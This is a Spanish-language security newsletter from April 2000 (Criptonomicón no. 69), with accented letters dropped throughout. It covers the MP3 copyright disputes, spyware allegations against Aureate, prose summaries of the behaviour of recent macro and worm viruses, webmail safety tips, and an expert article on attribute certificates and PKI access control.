visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/linux/proteger.html (3 of 3) [25/10/2000 02:34:40 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

-----BEGIN PGP SIGNED MESSAGE----Hash: SHA1


Boletn del Criptonomicn
http://www.iec.csic.es/criptonomicon
Ao II, n 69
6 de abril de 2000
******************************************
Susurros desde la Cripta
1. Las guerras de los MP3
Las noticias de la semana
2. Un espa en mi ordenador?
3. La polica pone al da su rea de investigacin de los
'ciberdelitos'
4. La noticia de HispaSec: Inglaterra se siente con derecho a
espiar
Candados, cortafros y otras herramientas
5. ITS4: Herramienta de seguridad para software de fuentes abiertas
Parada y fonda
6. Virus Attack!
Consejos y trucos
7. Correo Web seguro
Virus y otros bichos
8. Los ltimos virus
Hablan los expertos
9. Control de accesos (y II)
Sobre
10.
11.
12.

el boletn del Criptonomicn


Informacin sobre suscripcin y cmo borrarse
Nmeros atrasados
Firma PGP

******************************************
Susurros desde la cripta
******************************************
1. Las guerras de los MP3
Acabar el formato MP3 y la distribucin de msica a travs de
Internet con la industria discogrfica? Para muchos la respuesta es
un contundente y rotundo S. La nica duda resta en saber exactamente
en cunto tiempo.
Esta industria multimillonaria se ha caracterizado por aplastar todas
las tecnologas que potencialmente podan amenazar sus vastos
intereses econmicos. Primero destruy el formato DAT y cuando MP3 se
extenda peligrosamente, su reaccin no se hizo esperar: en cuanto
Diamond (www.diamond.com) lanz al mercado su controvertido
reproductor Rio, la RIAA (Asociacin Americana de la Industria
Discogrfica), que representa a los principales sellos discogrficos
del mundo, llev a la compaa a los tribunales alegando que la venta
de Rio alentara la piratera. El veredicto final, emitido en junio
de 1999, declar que Rio no violaba ninguna ley ni la AHRA (Audio
Home Recording Act), en la medida en que el reproductor copia las

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (1 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

canciones directamente de un ordenador y no desde un CD original.


Este veredicto se consider una gran victoria de MP3 sobre la voraz
industria discogrfica. A continuacin, RIAA se volvi contra MP3.com
(www.mp3.com), el mayor sitio web de distribucin de msica
comprimida. En enero de 2000, la asociacin de discogrficas demand
a MP3.com por supuesta infraccin de derechos de autor de ms de
45.000 CD de msica, ofrecidos a travs de su servicio My.MP3 en
circunstancias que poco tenan que ver con las acusaciones. Por su
parte, MP3.com demand a RIAA un mes despus por prcticas
comerciales desleales, difamacin, libelo, e interferencias con
posibles ganancias econmicas. Otros demandados por RIAA han sido
Lycos (caso perdido tambin) y Napster (probablemente, perdido
tambin). Los defensores de MP3 y la msica en Internet se preguntan,
a cuntos ms debe demandar la RIAA antes de darse cuenta de que su
guerra est perdida?
Qu guerra? Cuando el canal de distribucin primario era el CD, las
cosas estaban atadas y bien atadas. Que alguien graba un CD a cinta?
No supone una amenaza, al fin y al cabo, la calidad es menor. Poco
despus hacen su aparicin los copiadores de CD-ROM. Que la
industria discogrfica afronta prdidas por piratera? Tampoco pasa
nada, al fin y al cabo, todos estn metidos en el mismo cotarro y son
los que venden los aparatos, los CD vrgenes y dems: se grava a los
CD vrgenes con un canon para afrontar las prdidas y los ingresos
vuelven a su cauce. Que el artista sale perdiendo? Qu se le va a
hacer.
Sin embargo, la distribucin de msica a travs de Internet, que
gracias al formato de compresin de MP3 permite su rpida descarga y
almacenamiento en disco, hace tambalear los cimientos de este
emporio. La primera solucin buscada consisti en luchar contra MP3,
pero no se puede escupir a las cataratas del Nigara. Al fin y al
cabo, a lo mejor hasta se puede sacar tajada de Internet. Vivimos en
plena fiebre de pelotazos, no?
"Si no puedes con ellos, nete a ellos", dice el refrn. La RIAA, con
su Iniciativa para la Msica Digital Segura (SDMI), est intentando
poner freno a la distribucin incontrolada del MP3, pero sin
renunciar a sus nuevas oportunidades de negocio a travs de Internet.
La SDMI, lanzada por RIAA y que rene a ms de 160 compaas y
organizaciones, entre ellas sellos discogrficos (como los gigantes
EMI o Warner), compaas de electrnica y de TI, proveedores de
servicio de Internet y compaas de tecnologa de seguridad, ha
estado trabajando en la creacin de un estndar para la proteccin de
msica en MP3 y otros formatos. Hasta el momento, en su Fase I, la
SDMI ha acordado adoptar la tecnologa de Verance Corporation
(www.verance.com), llamada Musicode, para la insercin de marcas de
agua robustas en las obras musicales. La Sociedad General de Autores
y Editores (SGAE) ha firmado en diciembre del ao pasado un acuerdo
con Verance, que licencia a la SGAE para que utilice la tecnologa
MusiCode de Verance para incluir marcas de agua inaudibles en las
obras musicales de sus miembros y monitorizar automticamente sus
difusiones pblicas por radio, TV e Internet. De esta forma, la
alianza entre SGAE y Verance supone un hito en la historia de la
moderna lucha contra la piratera digital.
En el futuro, los reproductores MP3, incluido Rio, que cumplan con
las especificaciones de la SDMI, slo sern capaces de reproducir la
msica grabada legalmente, dotando as a las compaas discogrficas
de mayor control sobre sus materiales protegidos. Con esta
iniciativa, la RIAA pretende adoptar un marco comn para que artistas

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (2 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

y empresas de tecnologa y sellos discogrficos puedan utilizar


Internet como nuevo canal de distribucin, novedoso y potencialmente
muy beneficioso. Eso s, velando por la proteccin de los derechos de
autor legtimos.
Queda por ver la aceptacin que tendrn estas nuevas medidas entre el
pblico y las pequeas casas y distribuidoras y tiendas de msica.
Se pretende salvaguardar las ventas de los grandes sellos, que ven
amenazada su posicin de abuso con la democratizacin de las
tecnologas de copia y reproduccin de msica, o proteger los
derechos de autor de los artistas? La criptografa no da respuestas a
estas preguntas, ofrece herramientas para proteger la propiedad
intelectual, como las marcas de agua, pero nunca infalibles. Y si no,
que le pregunten a Stephen King.
Informacin adicional:
Marcas de agua:
www.iec.csic.es/criptonomicon/articulos/expertos64.html
SDMI: www.sdmi.org
RIAA: www.riaa.com
SGAE: www.sgae.es
Opina sobre este tema. Enva tus comentarios a
criptonomicon@iec.csic.es.
******************************************
Las noticias de la semana
******************************************
2. Un espa en mi ordenador?
La semana pasada se aire en numerosos medios de comunicacin la
noticia de un programa (advert.dll) que la firma Aureate
(www.aureate.com) filtraba en muchos ordenadores junto con programas
freeware o shareware. Este programa, cuya finalidad es actualizar
banners publicitarios en el software que el usuario instala (tales
como GetRight o CuteFTP), segn las noticias ms alarmistas se
dedicara en realidad a espiar la actividad del usuario y enviar
informes posteriormente a la casa Aureate.
Aunque los verdaderos fines del programa son un misterio, lo cierto
es que nadie ha presentado hasta la fecha pruebas que apoyen las
acusaciones a que se ha sometido a este programa de Aureate. Por
supuesto, cada lector es libre de pensar lo que quiera, especialmente
ahora que estn tan de moda las teoras de la conspiracin. En los
siguientes enlaces se presenta una completa seleccin de opiniones
para todos los gustos. En principio, me gustara otorgar a Aureate la
presuncin de inocencia.
Aureate, espa:
http://ibrujula.com/news/noticia.php3?id=3262
http://www.caravantes.com/aureate/
http://grc.com/optout.htm
Aureate, inocente:
http://www.lasnoticias.org/analisis/2000_03_26_21_12_01.html
http://www.kasperskylab.ru/eng/news/press/000314-1.asp
http://www.kriptopolis.com/jmg/20000328.html
******************************************

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (3 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

3. La polica pone al da su rea de investigacin de los


'ciberdelitos'
Con vino espaol, videoconferencia y la fugaz presencia del ministro
del Interior, Jaime Mayor Oreja, la Direccin General de Polica bot
la semana pasada la Unidad de Investigacin de la Delincuencia en
Tecnologas de la Informacin (UIDTI). Su comisario jefe es
Bernardino Cortijo, procedente del rea de Informtica del cuerpo. La
presentacin se hizo en el contexto de las Primeras jornadas
policiales sobre innovacin tecnolgica.
La noticia completa en:
http://www.ciberpais.elpais.es/c/d/20000406/cibersoc/socie4.htm
******************************************
4. La noticia de HispaSec: Inglaterra se siente con derecho a espiar
Londres respondi a las crticas europeas con una carta en la que si
bien niega su implicacin en el caso Echelon asegura tener la
legislacin de su parte para la realizacin de ese tipo de espionaje.
La noticia completa en www.hispasec.com/unaaldia.asp?id=525
******************************************
Candados, cortafros y otras herramientas
******************************************
5. ITS4: Herramienta de seguridad para software de fuentes abiertas
El Grupo de Seguridad del Software de RST disea, analiza y pone a
prueba softare crtico para la seguridad de sistemas. ITS4 ayuda a
automatizar la revisin de cdigo por motivos de seguridad. Se trata
de una sencilla herramienta que realiza rastreos estadsticos en
cdigo fuente en C y C++ en busca de potenciales agujeros de
seguridad, como llamadas a funcin peligrosas. Aunque est diseado
para entornos tipo Unix, puede funcionar tambin en Windows si se
tiene instalado CygWin.
ITS4 es l mismo cdigo abierto y est disponible gratuitamente para
uso no comercial en:
www.rstcorp.com/its4
Conoces alguna buena herramienta gratuita de seguridad que an no
haya sido reseada? Infrmame sobre su existencia escribindome a
criptonomicon@iec.csic.es.
******************************************
Parada y fonda
******************************************
6. Virus Attack!
Virus Attack! es un sitio que naci con la idea de divulgar
informacin actualizada sobre virus informticos, y de brindar
consultora gratuita a cualquier usuario que necesite ayuda sobre el
tema.
Consta de varias secciones, entre las que vale destacar las
siguientes:

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (4 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

- - BASE DE DATOS: una completa fuente de referencia con las


caractersticas y formas de remocin de los ms conocidos y
peligrosos virus informticos.
- - ALERTAS: Listado de los ltimos virus descubiertos, con su
respectiva gravedad, para que el usuario est al tanto de las nuevas
apariciones de estos maliciosos programas.
- - HOAXES: Las ms conocidas y difundidas falsas alarmas en un sitio
para que el usuario pueda consultarlas.
- - FAQS: Preguntas ms frecuentes acerca de los virus informticos,
realizadas por nuestros usuarios.
- - ANTIVIRUS: Un listado completo de software antivirus, discriminado
por sistema operativo.
- - PARCHES: Todos los arreglos para los agujeros de seguridad
relacionados con virus informticos de las aplicaciones ms
utilizadas.
- - NOTICIAS y ARTICULOS: las ltimas noticias acerca de los virus
informticos.
Y mucha, pero mucha ms informacin, incluyendo una lista de correo
que alerta a sus suscriptores de los nuevos virus, y les hace llegar
toda la nueva informacin acerca de ellos.
Ignacio M. Sbampato
VirusAttack WebMaster
http://www.virusattack.com.ar/
mailto:virusattack@ciudad.com.ar
Conoces alguna pgina web sobre seguridad y criptografa
(preferiblemente en castellano) que sea imprescindible y que yo an
no haya mencionado? Hzmela llegar. Enva la direccin de tu pgina
favorita a criptonomicon@iec.csic.es.
******************************************
Consejos y trucos
******************************************
7. Correo Web seguro
El correo Web, por su conveniencia, facilidad de uso y precio (es
gratis!), se est convirtiendo en una herramienta cada da ms
utilizada. Pero qu riesgos entraa? Hotmail ha compilado las
siguientes sugerencias para ayudarle a ser un usuario de correo
electrnico seguro y con sentido comn:
Modifique su contrasea con frecuencia. El cambio de contrasea puede
asegurar que su correo electrnico siga siendo privado. Adems, las
contraseas que utilizan letras y nmeros son ms difciles de
adivinar.
No comparta su contrasea. La mayora de los administradores de
correo electrnico no le pedir su contrasea. No se deje engaar por
mensajes de correo electrnico maliciosos que le pidan su contrasea.
ste es un truco bien conocido, aunque no demasiado comn, ideado

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (5 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

para engaarle y hacer que comparta su contrasea. Como regla


general, no la comparta nunca con nadie.
Nunca abra archivos de datos adjuntos que provengan de un origen
desconocido. Pueden contener lo que se conoce como "cartas bomba" o
"virus", los cuales pueden daar su PC.
Recuerde siempre cerrar la sesin cuando haya terminado. Es rpido,
fcil y puede impedir que intrusos no deseados tengan acceso a su
cuenta. Si utiliza un equipo pblico, en un caf de Internet por
ejemplo, le aconsejamos que cierre el explorador que estaba
utilizando cuando est preparado para finalizar su sesin de
Internet.
No responda a mensajes no solicitados ("spam"), u otro tipo de correo
ofensivo o de acoso. Al responder, lo que nico que hace es confirmar
que tiene una direccin de correo electrnico activa a la que pueden
enviar constantemente correo electrnico no solicitado. En su lugar,
dirija el mensaje no solicitado al departamento del servicio al
cliente del correo electrnico de origen (normalmente algo similar a
abuse@[dominiocorrespondiente].com). Para ayudar a controlar el envo
masivo, Hotmail proporciona a sus usuarios "filtros" para el correo
entrante. stos se pueden configurar fcilmente para enviar ciertos
mensajes (como los que incluyan ciertas palabras) directamente a su
papelera de reciclaje.
Asegrese de que utiliza el software de Internet ms reciente (p.e.,
un explorador como Microsoft Internet Explorer o Netscape Navigator).
Las versiones ms recientes a menudo ofrecen mejoras para proteger la
seguridad.
Utilice siempre una red segura. La mayor parte de redes corporativas
y proveedores de servicios Internet estn protegidos por
administradores que vigilan los posibles problemas de seguridad y
actan para proteger a los usuarios de los "intrusos" (usuarios
malintencionados) que pueden intentar robar informacin personal que
se transfiera a travs de la red. Aunque el riesgo es pequeo, tenga
precaucin cuando utilice una red que no le sea familiar. Use
estaciones mantenidas por personal de confianza, o bien pregunte si
el equipo de Internet que utiliza est protegido contra infracciones
de seguridad.
Utilice el sentido comn cuando est conectado a Internet y mantenga
cierta dosis de escepticismo. Tenga precaucin cuando revele
informacin personal, tal como su direccin fsica, a cualquiera que
conozca en el ciberespacio; incluso si afirma ser una autoridad.
Fuente: www.hotmail.es
Ms consejos y trucos en:
http://www.iec.csic.es/criptonomicon/consejos/
Participa enviando tus consejos y trucos a criptonomicon@iec.csic.es.
******************************************
Virus y otros bichos
******************************************
8. Los ltimos virus

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (6 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

Seccin realizada por Jos Luis Lpez (jllopez@nativo.com)


Resumen de virus detectados entre los das 17 de marzo y 2 de abril
de 2000.
- - --- - Nombre: WM97/Myna-D, WM97/Myna-J
- - Tipo: Virus de macros de Word 97
Este virus ha sido reportado activo (in-the-wild).
Cmo otros similares de la misma familia, es un clsico virus de
macros de Word, que no contiene ningn cdigo daino. Su cdigo
contiene la frase MYNAMEISVIRUS que se usa como indicador de
infeccin.
- - --- - Nombre: WM97/Marker-AX
- - Tipo: Virus de macros de Word 97
Reportado activo, este virus de macros, hace que en una de cada tres
oportunidades que un documento sea cerrado, se muestre en pantalla la
ventana de sumario del documento, desplegando como nombre de autor el
de "Ethan Frome".
- - --- - Nombre: WM97/Thursday-Q
- - Tipo: Virus de macros de Word 97
Virus activo. Se trata de una variante del WM97/Thursday. El 13 de
diciembre de cada ao, el virus intentar borrar todos los archivos
de la unidad C:.
- - --- - Nombre: WM97/Thursday-P
- - Tipo: Virus de macros de Word 97
Variante del WM97/Thursday, que sin embargo no incluye su misma
rutina destructiva, siendo en lo dems, similar.
- - --- - Nombre: XM97/Divi-C
- - Tipo: Virus de macros de Excel 97
Virus tambin "in-the-wild". Variante del XM97/Divi-A, crea un
archivo de nombre BASE5874.XLS en el directorio de las plantillas de
Excel, e infecta todas las hojas de clculo que se abran o cierren.
Agrega un indicador (flag), consistente en la variable IVID y un
nmero en formato hexadecimal, a cada archivo infectado. Usa esta
bandera como indicador de infeccin.
- - --- - Nombre: XM97/Divi-D
- - Tipo: Virus de macros de Excel 97
Virus "in-the-wild". Variante del XM97/Divi-A. Crea un archivo
llamado 874.XLS en el directorio de inicio de Excel, e infecta a
todas las hojas de clculo que sean abiertas o cerradas, una vez
activo.
- - ---

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (7 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

- - Nombre: WM97/Marker-BX
- - Variantes: WM97/Marker-CX
- - Tipo: Virus de macros de Word 97
Virus reportado activo. Si la fecha actual es posterior a junio de
1999, el virus intenta crear mltiples copias de s mismo en la
carpeta C:\Windows. Estas copias son nombradas AAxAA.DOC, donde "x"
es un nmero de 1 a 999999991. El primer documento se llamar
AA1AA.DOC y continuar hasta crear el AA999999991AA.DOC, o hasta que
se acabe el espacio libre en el disco.
-

--Nombre: Irok-10000
Seudnimos: VBS/Irok, VBS/Irok.Trojan,
Tipo: Ejecutable y virus de mIRC

Irok-10000 se propaga infectando archivos, envindose va e-mail y


distribuyndose a travs del programa mIRC usado en los canales de
chat (IRC, Internet Relay Chat). Crea una copia de s mismo llamada
"irok.exe" en el directorio SYSTEM de Windows, y un archivo de
VBScript llamado "irokrun.vbs" en el grupo de inicio
(Programas\Inicio). Este script se encarga de enviar por correo
electrnico el propio virus, a las primeras 60 entradas de la libreta
de direcciones del Outlook.
Como asunto del e-mail enviado pone: "I thought you might like to see
this" ("Pens que le puede gustar ver esto.").
Mientras que en el cuerpo del mensaje escribe: "I thought you might
like this. I got it from paramount pictures website. It's a startrek
screen saver." (Yo pens que podra gustarle esto. Yo lo consegu del
website de Paramount pictures. Es un protector de pantallas de
startrek.")
Adjunto al mensaje, se enva el propio virus, en un archivo llamado
"Irok.exe".
Cuando este programa se ejecuta, desplegar puntos blancos que se
mueven por la pantalla, al estilo de las estrellas visualizadas en la
recordada serie "StarTrek". Si el mIRC se encuentra instalado en
nuestro PC, tambin crear el archivo "script.ini" en el directorio
del mIRC.
- - --- - Nombre: Irok-7877
- - Tipo: Ejecutable y virus de mIRC
Es una variante del Irok-10000 virus. Se propaga en la misma forma
que el anterior, despliega el mismo efecto de puntos blancos,
modifica el mIRC, pero a diferencia del anterior, muestra en
ocasiones un mensaje ofensivo, adems de ser capaz de corromper
ciertos datos en el disco duro.
El autor de Irok-10000 e Irok-7877 (Raid), es el mismo del virus HLL
Toadie.7800.
- - --- - Nombre: WM97/Ethan-CK
- - Tipo: Virus de macros de Word 97
Virus activo. Lo nico que hace es cambiar las propiedades (sumario)

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (8 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

del documento infectado por las siguientes: Ttulo = "Ethan Frome",


Autor = "EW/LN/CB", Palabras clave = "Ethan".
- - --- - Nombre: BAT/911-A (BAT.Chode.Worm, W95/Firkin.worm, Foreskin,
BAT911, Bat/Firkin.A)
- - Variante: BAT/911-B (BAT.Chode.Worm, W95/Firkin.worm, Foreskin,
BAT911, Bat/Firkin.B)
- - Tipo: Gusano de archivos Batch
Han sido detectados algunos casos, sobre todo en Estados Unidos. Este
gusano consiste en un elevado nmero de archivos de proceso por lotes
(BATCH), los conocidos .BAT, y un script en VBScript (.VBS). El virus
intenta acceder a las computadoras que estn en conectadas a la misma
subred (con direcciones IP).
Si el virus logra acceder a una de estas computadoras, crea algunos
subdirectorios llamados:
C:\progra~1\chode, C:\progra~1\foreskin y C:\progra~1\dickhair. Estas
carpetas son creadas con el atributo de oculto (H) encendido. Para
poder verlos, deber tener activa la opcin "Ver archivos ocultos"
(en el Explorador de Windows, seleccione Ver, Opciones u Opciones de
carpetas, Ver, Mostrar todos los archivos).
Bajo ciertas circunstancias, dos de cada seis veces (tres de cada
siete en la variante 911-B) el virus modifica el archivo AUTOEXEC.BAT
de una de las computadoras remotas, para que cuando esta se reinicie,
intente un formateo incondicional de las unidades de disco H:, G:,
F:, E:, y D:.
Tambin despliega un mensaje ofensivo, e intenta el formateo
incondicional de la unidad C:.
Existen 3 de 6 chances de que el virus no haga nada (en la versin
911-A)
Una de cada 6 oportunidades (4 de cada 7 en la variante 911-B), el
virus intentar llamar, usando los puertos COM1, COM2, COM3 y COM4 al
mismo tiempo, al 911 (nmero telefnico de emergencias en muchos
pases).
El da 19 de cada mes, intentar adems borrar todos los archivos en
los directorios y subdirectorios C:\Windows, C:\Windows\System,
C:\Windows\Command, y en el directorio raz de C:\.
******************************************
Hablan los expertos
******************************************
9. Control de accesos (y II)
Esta semana contamos por gentileza de la revista SIC con la
colaboracin de Luis Rodrguez Berzosa (lrodriguez@idealobjects.com),
licenciado en fsicas y matemticas por la U. Complutense de Madrid.
Ha trabajado en compaas del sector como consultor de Seguridad, y
en la actualidad es director tcnico de Ideal Objects. Sus intereses
estn en XML y WAP, la seguridad en objetos distribuidos, y la
tecnologa de clave pblica. Nos hablar en su artculo de la
evolucin de las tecnologas de control de acceso a la informacin,
desde los primeros sistemas centralizados hasta las modernas
estructuras PKI.

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (9 of 13) [25/10/2000 02:35:19 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

Los certificados de atributos


- ----------------------------Los certificados de atributos no son sino la respuesta de clave
pblica a los 'certificados de atributos de privilegio' usados en el
pasado. La idea es simple: 'Demos al Csar lo que es del Csar'. Los
certificados de clave pblica X.509 proporcionan evidencia de la
identidad de una persona (aunque incluso esto puede ponerse en
cuestin). Pero en entornos de comercio electrnico, se precisa ms
informacin que la mera identidad, en especial cuando las partes
involucradas en una transaccin no han tenido contacto previo. En
este caso, la informacin sobre los atributos de privilegio de una
persona (por ejemplo, su capacidad de firmar un contrato, o su lmite
de crdito) es mucho ms relevante que su mera identidad.
X.509 v3 intodujo el til concepto de extensin. Lo ms lgico
pareci en ese momento aadir al certificado de identidad extensiones
que recogieran estos atributos. Pero es como mezclar agua y aceite.
Los atributos de privilegio cambian mucho ms a menudo que la
identidad de los individuos, lo cual obliga a revocar el certificado
antiguo y emitir uno nuevo. Y la validacin del certificado, que ya
era tema delicado por las revocaciones debidas, se convierte en esta
situacin en tema trascendental (evidentes cuando se otorga un
certificado al director de compras, y a continuacin se le despide).
Las extensiones dedicadas al control de accesos son propietarias, y
dificultan la interoperabilidad. Y, por si fuera poco, tenemos un
problema de jurisdiccin: el certificado de identidad podr ser
emitido por una autoridad de certificacin que d fe de la identidad
del usuario (como FNMT/MAP/Correos); pero, puede la FNMT erigirse
como depositaria de la concesin de privilegios de utilizacin de los
recursos de informacin de mi empresa X?
La respuesta a estas dificultades es inmediata: Por qu no dividir
el certificado X.509 en dos, uno para la informacin de identidad
- -certificado de identidad, y el otro para la informacin ligada con
el control de accesos -certificado de atributos? Esto simplifica el
proceso de emisin y, si los certificados de atributos se emiten con
una duracin limitada, eliminar en ciertas circunstancias el problema
de revocacin. Si los certificados de atributos duran un da, o una
hora, podra no ser necesaria su revocacin: simplemente expiran.
Cules pueden ser los atributos encerrados en un certificado de esta
clase? Roles, grupos, identidades de acceso y/o auditora (para
aplicaciones de sign-on nico), restricciones... Por ejemplo, un
atributo puede expresar el lmite de crdito concedido a un
determinado suscriptor a un servicio de tienda virtual. Las
posibilidades son ilimitadas. Podemos contemplar as los certificados
de atributos como un 'manojo de llaves' que se aaden a un
certificado de identidad ('pasaporte digital') para abrir
determinadas puertas.
Ejemplos de aplicaciones de esta tecnologa son:
* Servicios de suscripcin ('pago por visin'). Los usuarios se
registraran de forma gratuita, pero slo obtendran un certificado
de atributos tras el pago de una cuota de subscripcin. La duracin
del certificado correspondera a la de disfrute del servicio
subscrito.
* Control de accesos basado en roles a servicios en red cuya
autenticacin se realiza usando una PKI (web, FTP, SMTP...). El

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (10 of 13) [25/10/2000 02:35:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

protocolo SSL autentica al cliente; un certificado de atributos


permite al servicio determinar qu puede hacer el usuario dentro del
mismo.
* Control de accesos a redes privadas virtuales (RPV). Pinsese en
los usuarios 'itinerantes' de una gran organizacin. En vez de
mantener controles de acceso replicados en cada puerta de acceso RPV,
mediante un servicio centralizado se concede al usuario un
certificado de atributos que le franquee el acceso a travs del
puerto de acceso.
* Sign-on nico basado en autenticacin fuerte mediante tarjeta
inteligente. Las credenciales necesarias para el acceso a
aplicaciones (usuario / password) pueden ir cifradas en el
certificado de atributos concedido al usuario tras el proceso de
autenticacin basado en la posesin de la clave privada en tarjeta
inteligente.
Certificacin cruzada y traduccin de polticas
- ----------------------------------------------Otro medio de controlar el acceso a servicios de alto nivel mediante
una PKI lo tenemos en el concepto de 'polticas de utilizacin' y
'traduccin de polticas'. A menudo la autoridad de certificacin
emisora s puede hacer establecer condiciones sobre la utilizacin de
las claves y el certificado emitido, a travs de las extensiones de
poltica de uso. El banco X puede emitir un certificado para un
cliente, y establecer a nivel de certificado de identidad el tipo de
servicio al que el cliente tiene derecho ('tarjeta oro' y
'superlibretn', por ejemplo). Esto no es tan flexible como los
certificados de atributos, pero puede ser perfectamente aprovechable
bajo ciertas condiciones.
Imaginemos que el banco X firma un acuerdo de colaboracin (o se
fusiona, segn cierta moda imperante) con el banco Y, que tiene su
propio servicio de banca virtual y emite certificados para dos tipos
de servicios, denominados sin demasiada imaginacin 'tarjeta platino'
y 'supersuperlibretn'. Ambos bancos emiten certificados cruzados
que, algn da, las aplicaciones de banca virtual de cada entidad
aprovecharn para otorgar su confianza a los poseedores de
certificados emitidos por el otro banco. El problema es: Equivale el
usuario de una 'tarjeta oro' del banco X a un usuario de la 'tarjeta
platino' del banco Y?
Este tipo de relaciones entre polticas de uso de certificados pueden
hacerse explcitas en los certificados cruzados mediante las
extensiones estndar de traduccin de polticas (policy mapping).
As, nuestros bancos podrn equipar las respectivas tarjetas oro y
platino, y no hacer lo propio con las 'superlibretn' y
'supersuperlibretn'. Aprovecharn algn da las aplicaciones esta
informacin?
Autorizacin en autoridades de validacin
- ----------------------------------------Sin validacin (comprobacin de que un certificado est firmado por
una cadena de autoridades entre las que se haya una en la que se
confa, que el certificado est dentro de su perodo de validez, y
que no haya sido revocado), el receptor de un certificado digital en
una transaccin de comercio-e slo podr confiar parcialmente en la
misma. En el mundo de las tarjetas de crdito, cuando uno se halla
enfrente del terminal punto de venta, tiene lugar una validacin en
lnea de la tarjeta, en la que la disponibilidad es esencial (la

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (11 of 13) [25/10/2000 02:35:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

emisin de la tarjeta, por contra, es una funcin fuera de lnea:


poco importa que la tarjeta me llegue un da antes o un da despus).
Lo mismo ocurre con los certificados digitales: su emisin suele ser
un proceso offline, mientras que su validacin es un proceso online.
Para entornos de produccin, o para aplicaciones de alta sensibilidad
(no ya el pago del alquiler de una pelcula en el videoclub de la
esquina), una PKI sin validacin es fundamentalmente incompleta e
insegura. Para proporcionar esta funcin surgen las Autoridades de
Validacin, cuya competencia es la validacin de los certificados, no
su emisin; y aadir a la validacin 'intrnseca' (firma correcta por
una cadena de autoridades en la que se confa, validez temporal, no
revocacin/suspensin) una validacin extrnseca: A partir de
informacin de poltica de accesos se establece si un certificado es
vlido -si, adems de ser vlido intrnsecamente, verifica adems las
condiciones de la poltica de accesos impuestas por la organizacin.
Y si el certificado no es 'vlido', la aplicacin se niega a ofrecer
el servicio solicitado.
El imponer un punto de control de accesos en el proceso de validacin
tiene sustanciales ventajas: La validacin es un proceso
independiente de la emisin del certificado, de forma que los
parmetros para la autorizacin pueden modificarse 'a posteriori',
tras la emisin del certificado: Cambios en la poltica de accesos no
requieren la revocacin del certificado.
Conclusin
- ---------Lejos quedan ya los tiempos en los que todo se reduca a asegurar el
mainframe corporativo. La evolucin de los sistemas de control de
accesos ha ido pareja con la de los sistemas de informacin. Vivimos
en un mundo, mal que nos pese, dirigido a los sistemas no ya
distribuidos, sino 'desparramados', y se hacen necesarios los modelos
de control de accesos para estos nuevos sistemas. La tecnologa de
clave pblica, como viene siendo habitual, tiene mucho que decir al
respecto.
Opina sobre este tema. Enva tus comentarios a
criptonomicon@iec.csic.es.
Eres experto en algn rea relacionada con la seguridad o la
criptografa y quieres colaborar con el Criptonomicn? Enva tu
artculo a criptonomicon@iec.csic.es.
******************************************
Sobre el boletn del Criptonomicn
******************************************
10. Informacin sobre suscripcin y cmo borrarse
Para borrarse de este servicio basta con enviar un correo a la
direccin cripto-request@iec.csic.es con el siguiente mensaje (sin
asunto o "subject"):
leave
desde la misma cuenta de correo en la que recibs el boletn.
Tenis ms informacin y nmeros atrasados en la pgina

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (12 of 13) [25/10/2000 02:35:20 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt

http://www.iec.csic.es/criptonomicon/suscripcion.html
******************************************
11. Nmeros atrasados
Podis encontrar los nmeros atrasados del boletn en:
http://www.iec.csic.es/criptonomicon/suscripcion.html
Se pueden recuperar todos en formato ZIP o de uno en uno.
******************************************
12. Firma PGP
Se puede obtener la clave pblica PGP del Criptonomicn en:
http://www.iec.csic.es/criptonomicon/criptonomicon.txt
Para ms informacin sobre qu es el correo seguro y cmo funciona
PGP, se puede visitar:
http://www.iec.csic.es/criptonomicon/correo/
******************************************
(C) Copyright 2000 Criptonomicn
http://www.iec.csic.es/criptonomicon
Un servicio ofrecido libremente desde el Instituto de Fsica Aplicada
del CSIC por Gonzalo lvarez Maran
email: criptonomicon@iec.csic.es
Todos los trabajos, artculos, comentarios u opiniones de los
colaboradores de Criptonomicn son de su exclusiva responsabilidad,
siendo ellos los que responden de la veracidad y exactitud de sus
aportaciones. Criptonomicn agradece las mencionadas colaboraciones,
pero no comparte necesariamente las opiniones manifestadas. Asimismo,
es responsabilidad del lector descargar, instalar y ejecutar en su
propio sistema los programas que se mencionen en el Criptonomicn.
-----BEGIN PGP SIGNATURE----Version: PGPfreeware 6.5.1 for non-commercial use <http://www.pgp.com>
